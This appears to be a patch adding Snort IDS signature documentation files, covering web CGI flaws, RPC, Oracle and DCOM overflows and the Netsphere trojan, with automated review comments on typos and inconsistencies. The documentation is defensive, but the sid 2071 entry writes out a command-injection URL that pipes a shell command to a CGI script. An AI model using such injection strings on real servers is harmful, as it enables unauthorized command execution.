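Review bot: "reconnaisance" in Impact and "consititute" in Detailed Information are misspelled (reconnaissance, constitute). Beyond the one clause in the Summary, nothing in this file is specific to UDP scans even though the sid is for the UDP portscan event; a sentence on what distinguishes a UDP scan from the TCP variants, or a pointer to the relevant part of README.sfportscan, would make the file more than a copy of the generic sfPortscan text.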
--- /dev/null
+++ b/doc/signatures/921.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+921
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
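Review bot: Affected Systems is empty; the other generic web-authentication documents in this patch fill it with "All systems using a web server" or similar, and this one should too. "ona web server" in Detailed Information is missing a space.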
--- /dev/null
+++ b/doc/signatures/1924.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+1924
+
+--
+Summary:
+This event is generated when a request is made to Network File System (NFS) to list all file systems and which clients are permitted to mount each file system. 
+
+--
+Impact:
+Information disclosure.  This can allow an attacker to discover exported NFS file systems and client mount permissions.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a list of exported file systems and client mount permissions.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt to list the exported NFS file systems as a precursor to mounting them to read or change a specific file. 
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list exported NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+http://www.whitehats.com/info/IDS26
+
+--
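Review bot: the Summary says the request is made "to Network File System (NFS) to list all file systems", but Detailed Information correctly attributes the export listing to the mountd RPC service; the Summary should name mountd (the export-list request that showmount-style clients issue) rather than NFS itself. The Additional References entry also lacks the source label line ("Whitehats arachNIDS") that the other files in this patch put above the URL.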
--- /dev/null
+++ b/doc/signatures/1944.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1944
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2779.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2779
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_site_priority_site
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
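Review bot: as in the specify_new_masters document in this patch, the procedure name in Detailed Information is split so that ". This procedure is included in" sits on its own line; join it into "vulnerability in the procedure drop_site_priority_site. This procedure is included in dbms_repcat." Affected Systems reads "Oracle Oracle9i" with the vendor name duplicated, and Additional References is empty.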
--- /dev/null
+++ b/doc/signatures/2071.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2071
+
+--
+Summary:
+made.
+
+--
+Impact:
+Code execution and possible control of the target machine
+
+--
+Detailed Information:
+Alibaba is a web server that runs on Windows platforms. An error in the 
+cgi script post32.exe allows piped commands to be processed on the 
+server.
+
+--
+Affected Systems:
+Computer Software Manufaktur Alibaba 2.0
+	Microsoft Windows 2000 Workstation
+	Microsoft Windows 95
+	Microsoft Windows 98
+	Microsoft Windows NT 4.0
+   
+--
+Attack Scenarios:
+The attacker merely needs to make an http request to the script using a 
+pipe command at the end of the URI to execute any command he chooses.
+
+For example, http://www.foo.com/cgi-bin/post32.exe|dir%20c:\
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade Alibaba to the latest non vulnerable version if available.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1485
+
+--
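Review bot: the Summary consists of the single word "made."; the sentence has been truncated and needs to be restored. Detailed Information and Attack Scenarios supply the content: an attempt to access the Alibaba post32.exe CGI script with a pipe character in the URI in order to execute commands on the server. Affected Systems lists "Microsoft Windows 2000 Workstation" at a different indentation from the other entries; align it with the rest of the list.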
--- /dev/null
+++ b/doc/signatures/2369.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2369
+
+--
+Summary:
+This event is generated when an attempt is made to access ISAPISkeleton.dll on a
+web server. This may indicate an attempt to exploit a cross-site 
+scripting vulnerability in BRS WebWeaver.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a 
+cross-site scripting vulnerability in BRS WebWeaver .
+An attacker can pass an argument to ISAPISkeleton.dll that may contain
+malicious code that could be executed on the victims machine. 
+
+--
+Affected Systems:
+	BRS WebWeaver 
+
+--
+Attack Scenarios:
+An attacker can pass a specific argument to ISAPISkeleton.dll that may
+contain malicious code.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
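Review bot: Impact says "Arbitrary code execution", but the vulnerability described is cross-site scripting, in which the injected script runs in the victim's browser in the context of the vulnerable site rather than on the server; Impact and Detailed Information should say "execution of script in the victim's browser, possible session hijack" so readers do not treat this as a server compromise. "victims machine" needs an apostrophe and "BRS WebWeaver ." has a stray space before the period.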
--- /dev/null
+++ b/doc/signatures/2200.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2200
+
+--
+Summary:
+This event is generated when an attempt is made to access dnewsweb.cgi on an internal web server. This may indicate an attempt to exploit a buffer overflow vulnerability in NetWin DNews News Server 5.3.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+NetWin DNews News is a web-based application that manages remote access to Internet newsgroups. When overly long arguments are used as arguments to some dnewsweb.cgi parameters (including but not limited to "group," "cmd," and "utag"), a buffer overflow condition may occur. This can lead to the remote execution of arbitrary code with the security context of DNews. 
+
+--
+Affected Systems:
+Any operating system running NetWin DNews News Server 5.3 or lower.
+
+--
+Attack Scenarios:
+An attacker transmits an overly long, specially crafted URL to the vulnerable DNews server, causing a buffer overflow condition. The attacker is then able to execute arbitrary code on the server with the security context of DNews. 
+
+--
+Ease of Attack:
+Simple. An exploit exists.
+
+--
+False Positives:
+If a legitimate remote user accesses dnewsweb.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to DNews News Server 5.4 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/1172
+
+--
--- /dev/null
+++ b/doc/signatures/2220.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2220
+
+--
+Summary:
+This event is generated when an attempt is made to access simplestmail.cgi on an internal web server. This may indicate an attempt to exploit a remote command execution vulnerability in Leif M. Wright's Simple Guestbook.
+
+--
+Impact:
+Remote execution of arbitrary code, possibly leading to remote root compromise.
+
+--
+Detailed Information:
+Leif Wright's Simple Guestbook uses a Perl script to manage web-based guestbook submissions. It improperly parses pipe metacharacters (|), allowing an attacker to place arbitrary shell commands between pipe characters in the guestbook value. These commands are then executed by the web server when it receives the request.
+
+--
+Affected Systems:
+Web servers running Leif M. Wright Simple Guestbook.
+
+--
+Attack Scenarios:
+An attacker uses a specially crafted value in the guestbook field between pipe characters. Any commands included in the value are executed with the security context of the web server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses simplestmail.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disable simplestmail.cgi. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/2106
+
+--
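Review bot: the Summary and Detailed Information call the product "Simple Guestbook" and refer to a "guestbook value", but the script the rule matches is simplestmail.cgi, whose name suggests a mail form rather than a guestbook; please confirm the product and the injected parameter against the Bugtraq entry cited under Additional References and make the Summary, Detailed Information and Corrective Action consistent with each other.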
--- /dev/null
+++ b/doc/signatures/3237.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3237
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
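Review bot: Attack Scenarios ("a request for a file with an overly long filename via a network share") reads as an SMB attack, while Detailed Information describes a malformed RPC request to a DCOM server; a sentence explaining how the overlong name reaches the RPC interface would reconcile the two. "Expoit" in Ease of Attack should be "Exploit", and Additional References is empty for a vulnerability the text says has both vendor patches and public exploit code; add the vendor bulletin.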
--- /dev/null
+++ b/doc/signatures/1315.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1315
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "hot young sex".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "hot young sex".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
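Review bot: as in the sid 1799 document, the Summary reads "a webpage was visited the included the content" and should read "that included the content", and Additional References trails off into six empty "+" lines; trim to one blank line before the closing "--".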
--- /dev/null
+++ b/doc/signatures/2502.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2502
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
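Review bot: "attcker" in Attack Scenarios should be "attacker", and the Impact section lacks the blank line before its closing "--" that every other section in the file has. Affected Systems says "Microsoft Windows 2000, 2003 and XP systems using SSL", while Detailed Information speaks of "various software implementations"; naming the services involved (the IIS and other components that use the Microsoft SSL library) would tell the reader which hosts to patch first.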
--- /dev/null
+++ b/doc/signatures/146.txt
@@ -0,0 +1,95 @@
+Rule:
+
+--
+Sid:
+146
+
+--
+Summary:
+Netsphere is a Trojan Horse offering the attacker access to the victims 
+filesystem, instant messaging clients and some control over peripherals.
+This event is generated when a Netsphere server responds to an attackers
+client.
+
+--
+Impact:
+Compromise of data integrity on the victim host as well as the 
+possibility of rendering the machine temporarily unusable.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Netsphere
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+The Trojan also gives the attacker the ability to access the victims 
+filesystem, turn the monitor on and off, control the mouse, access 
+instant messaging applications and render a pentium based machine 
+unusable.
+
+The Trojan is also known to use TCP ports 30100, 30101 and 30102.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is named NetSphereServer.exe.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	NSSX
+
+Removal of this entry is required.
+
+Delete the file NetSphereServer.exe.
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS76
+
+--
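Review bot: the file has no Affected Systems section; the list of affected Windows versions is placed inside Detailed Information instead. Move it under an "Affected Systems:" heading between Detailed Information and Attack Scenarios, as the other documents in this patch do. Also "Netsphere sever" should be "server", "victims filesystem" needs an apostrophe, and the registry text lists "NSSX" under "Registry keys added" although it sits under the ...\CurrentVersion\Run key, where entries are values rather than subkeys; reword as "the value NSSX under the Run key".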
--- /dev/null
+++ b/doc/signatures/3129.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3129
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
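Review bot: there is a stray blank line between the "--" separator and "Corrective Action:" that no other file in the patch has; remove it. Attack Scenarios says the attacker supplies "extra data in the message ... containing code of their choosing", while Detailed Information locates the unchecked buffer in the processing of the message length; the scenario should be phrased in terms of an oversized message length so the two sections agree.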
--- /dev/null
+++ b/doc/signatures/827.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+827
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
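Review bot: typo in Detailed Information: "running ona web server" should read "running on a web server", and "attackers choosing" (twice in this file) wants an apostrophe. The Summary never says which CGI application or request the rule matches, so this entry reads the same as every other generic CGI entry in the patch; naming the script or request pattern the rule looks for would make it useful, and Additional References is empty.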
--- /dev/null
+++ b/doc/signatures/100000791.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000791
+--
+Summary:
+This event is generated when an attempt is made to access the file "pv_core.php which contains known vulnerabilities in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a file with known vulnerabilities from a remote machine used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
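Review bot: unbalanced quote in the Summary: "pv_core.php is opened with a double quote that is never closed, so it should read "pv_core.php". The third Detailed Information paragraph (client credential validation, "running ona web server") is boilerplate from the generic CGI access entries and says nothing about a file with known vulnerabilities; it should be dropped or replaced with what the rule actually matches in the request. Minor: the blank line before "--" is missing after the Sid and after Affected Systems, unlike the rest of the file.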
--- /dev/null
+++ b/doc/signatures/1928.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid: 
+1928
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic 
+is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp 
+server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of
+spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or 
+it could be an attempt to compromise the FTP server by overflowing a 
+buffer in the FTP daemon or service.
+
+In this case, the rule will generate an event due to the attempted
+transfer of a shadow file. This file is generally used on muli-user
+systems to provide greater security for user passwords. This file should
+only be readable by the super user.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party 
+using FTP. Retrieval of the shadow file may allow a user to crack the
+encryption scheme used and gain unauthorized access to the host.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain 
+access to a host, then upload a Trojan Horse program to gain control of 
+that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected 
+network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
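Review bot: the Affected Systems section is missing from this file entirely (Detailed Information runs straight into Attack Scenarios); every other entry carries it, and here it should name any FTP server. Typo in Detailed Information: "muli-user" should be "multi-user". The Attack Scenarios wording "crack the encryption scheme" is imprecise: the shadow file holds password hashes, and what a copy enables is offline guessing against those hashes, which is worth stating plainly since it is the reason the Corrective Action restricts external FTP access.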
--- /dev/null
+++ b/doc/signatures/100000814.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000814
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SimpleBoard SBP" application running on a webserver. Access to the file "image_upload.php" using a remote file being passed as the "sbp" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "sbp" parameter in the "image_upload.php" script used by the "SimpleBoard SBP" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using SimpleBoard SBP
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
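Review bot: the third Detailed Information paragraph (client credential validation, "running ona web server") describes an authentication weakness, not the remote file include via the "sbp" parameter of "image_upload.php" that the Summary names, and the Attack Scenarios section likewise talks about supplying credentials; both look copied from the generic CGI template and should be replaced with a scenario for the "sbp" parameter. Also "an exploitation attempt has been attempted" in the Summary is redundant; "that exploitation has been attempted" reads better.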
--- /dev/null
+++ b/doc/signatures/593.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+593
+
+--
+Summary:
+This event is generated when an attempt is made through a portmap GETPORT request to discover the port where the Remote Procedure Call (RPC) snmpXdmi is listening.
+
+--
+Impact:
+Information disclosure.  This request is used to discover which port snmpXdmi is using.  Attackers can also learn what versions of the snmpXdmi protocol are accepted by snmpXdmi.
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts. It can be queried to determine the port where RPC services such as snmpXdmi run.  Simple Network Management Protocol (SNMP) and Desktop Management Interface (DMI) are remote management protocols.  The snmpXdmi RPC service translates between SNMP and DMI, allowing the use of either or both.  There is a buffer overflow when translating DMI to SNMP that allows access with the privilege level of snmpXdmi.
+
+--
+Affected Systems:
+Sun Solaris 2.6, 7.0, and 8.0.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover the port where snmpXdmi runs.  This may be a precursor to accessing snmpXdmi.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+If a legitimate remote user is allowed to access snmpXdmi, this rule may trigger.
+
+--
+False Negatives:
+This rule detects probes of the portmapper service for snmpXdmi, not probes of the snmpXdmi service itself. Because RPC services often listen on fairly arbitrary ports, it may not be possible to detect misuses of the snmpXdmi service itself. An attacker may attempt to go directly to the snmpXdmi port without querying the portmapper service, which would not trigger the rule.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
